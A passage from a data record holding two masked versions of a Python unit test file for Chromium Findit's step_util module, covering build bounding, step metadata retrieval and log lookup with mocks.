Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-3": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n <mask token>\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n <mask token>\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):\n upper_bound_build_number = 4\n lower_bound_build_number = 1\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)\n self.assertEqual(20, lower_bound.commit_position)\n self.assertEqual(20, upper_bound.commit_position)\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=False)\n def testStepNotSupportedByFindit(self, _):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'step', 'm'))\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditGtests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(GtestTestResults(\n None), 'browser_tests', 'm'))\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=\n 'log_stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=json.\n dumps(wf_testcase.SAMPLE_STEP_METADATA))\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n def testLegacyGetStepMetadata(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)\n def testLegacyGetStepMetadataStreamNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. Data is: log.')\n\n @mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)\n def testGetStepLogForLuciBuildError(self, _):\n self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's',\n None))\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog', return_value=\n {'canonical_step_name': 'unsupported_step1'})\n def testStepIsSupportedForMaster(self, _):\n master_name = 'master1'\n builder_name = 'b'\n build_number = 123\n step_name = 'unsupported_step1 on master1'\n self.assertFalse(step_util.StepIsSupportedForMaster(master_name,\n builder_name, build_number, step_name))\n <mask token>\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog')\n def testLegacyGetStepMetadataCached(self, mock_fn):\n mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]\n self.assertEqual('invalid', step_util.LegacyGetStepMetadata('m',\n 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n self.assertEqual(None, step_util.GetStepMetadata(123,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'canonical_step_name': 'step_name'})\n def testLegacyGetCanonicalStep(self, _):\n self.assertEqual('step_name', step_util.LegacyGetCanonicalStepName(\n 'm', 'b', 200, 'step_name on a platform'))\n\n @parameterized.expand([({'canonical_step_name': 'step_name'},\n 'step_name'), (None, 'step_name'), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepName(self, step_metadata,\n expected_canonical_step, mocked_get_step):\n mocked_get_step.return_value = step_metadata\n self.assertEqual(expected_canonical_step, step_util.\n GetCanonicalStepName(123, 'step_name (with patch)'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n <mask token>\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'a': 'b'})\n def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-4": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingWithinRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertEqual(valid_build_102, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuildInValid(self,\n *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuild(self, *_):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertEqual(upper_bound_build_number, lower_bound.build_number)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):\n upper_bound_build_number = 4\n lower_bound_build_number = 1\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)\n self.assertEqual(20, lower_bound.commit_position)\n self.assertEqual(20, upper_bound.commit_position)\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=False)\n def testStepNotSupportedByFindit(self, _):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'step', 'm'))\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditGtests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(GtestTestResults(\n None), 'browser_tests', 'm'))\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=\n 'log_stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=json.\n dumps(wf_testcase.SAMPLE_STEP_METADATA))\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n def testLegacyGetStepMetadata(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)\n def testLegacyGetStepMetadataStreamNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 